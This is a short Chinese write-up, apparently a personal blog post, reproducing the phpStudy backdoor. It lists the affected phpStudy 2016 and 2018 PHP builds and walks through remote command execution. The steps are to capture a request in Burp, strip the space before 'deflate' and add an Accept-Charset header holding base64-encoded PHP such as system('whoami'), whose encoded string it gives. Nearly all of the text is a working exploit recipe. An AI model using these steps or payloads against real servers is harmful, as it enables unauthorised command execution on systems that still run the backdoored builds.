ps:当时出的时候就复现了,但是由于种种原因(当初粗心,没好好留意)没有成功,今天终于成功了
目前已知受影响的phpstudy版本
phpstudy 2016版php-5.4
phpstudy 2018版php-5.2.17
phpstudy 2018版php-5.4.45
这里用phpstudy 2018版php-5.2.17
安装完成之后随便访问php文件,然后burp抓包
这里要注意的有两点,deflate前面的空格需要删除(最开始就是忘记了这里),然后添加一个accept-charset:base64加密后的命令
system('whoami') ;base64加密之后是c3lzdGVtKCd3aG9hbWknKSA7,成功返回
